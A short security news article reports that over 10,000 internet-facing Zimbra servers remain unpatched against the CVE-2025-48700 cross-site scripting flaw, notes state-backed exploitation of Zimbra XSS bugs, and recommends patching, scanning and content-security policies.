Over 10,000 Zimbra Servers Vulnerable to Ongoing XSS Attacks

Zimbra Collaboration Suite powers email and collaboration for millions, including government agencies and thousands of enterprises. The CVE‑2025‑48700 cross‑site scripting flaw, disclosed by Shadowserver, lets an unauthenticated attacker inject JavaScript into a user’s session simply by viewing a crafted email. Although Synacor released patches in mid‑2025, the sheer number of legacy installations—over 10,500 still reachable on the public internet—means the vulnerability remains a fertile hunting ground for threat actors. CISA’s decision to list the bug in its Known Exploited Vulnerabilities catalog reflects a broader shift toward proactive, government‑driven vulnerability management.

The geographic spread of the unpatched servers, with roughly equal concentrations in Asia and Europe, highlights a global patch‑lag problem. Recent intelligence shows that state‑backed groups such as Russia’s APT28 have already weaponized Zimbra XSS bugs in campaigns like Operation GhostMail, targeting Ukrainian ministries by embedding malicious JavaScript directly in email bodies. This technique bypasses traditional defenses that focus on attachments or links, making detection harder and emphasizing the need for robust content‑security policies within webmail interfaces.

For organizations, the lesson is clear: email infrastructure must be treated as a critical attack surface. Immediate actions include verifying Zimbra version compliance, applying Synacor’s security updates, and conducting external scans to confirm that no instances remain publicly exposed. Additionally, deploying web‑application firewalls, enforcing strict content‑security policies, and monitoring for anomalous JavaScript execution can mitigate the risk of XSS exploitation. As nation‑state actors continue to exploit legacy email platforms, a disciplined patch‑and‑monitor strategy becomes essential to safeguard sensitive communications and maintain regulatory compliance.